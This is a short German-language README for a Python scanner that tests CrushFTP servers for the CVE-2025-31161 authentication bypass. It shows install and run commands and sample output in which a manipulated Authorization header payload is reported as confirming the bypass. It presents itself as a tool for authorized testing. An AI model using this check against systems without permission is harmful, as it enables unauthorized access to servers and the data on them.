
Scans target to see if its vulnerable to CVE-2025-31161
Ein Python-Tool zur Erkennung und Prüfung der Schwachstelle CVE-2025-31161 in CrushFTP-Servern.
Dieses Skript testet die Authentifizierungs-Bypass-Schwachstelle (CVE-2025-31161) in CrushFTP-Servern, die es Remote-Angreifern ermöglicht, sich ohne gültige Anmeldedaten über eine Manipulation des HTTP-Authorization-Headers zu authentifizieren.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Ziel-IP-Adresse eingeben: 192.168.1.100
Ziel-Port eingeben [8080]: 8080
==================================================
📡 Teste: /WebInterface/
🔑 Payload: 'A'
📊 Status: 200
🎉 SCHWACHSTELLE BESTÄTIGT
💡 200 OK mit Inhalt: dashboard, main
✅ Funktionierender Payload: 'A'
==================================================
🎯 Ziel: 192.168.1.100:8080
🔴 SCHWACHSTELLENSTATUS: VERWUNDBAR
💥 CVE-2025-31161 Authentifizierungs-Bypass BESTÄTIGT
✅ Funktionierende Payloads:
==================================================
Dieses Tool dient nur zu Bildungs- und autorisierten Testzwecken. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testberechtigung haben.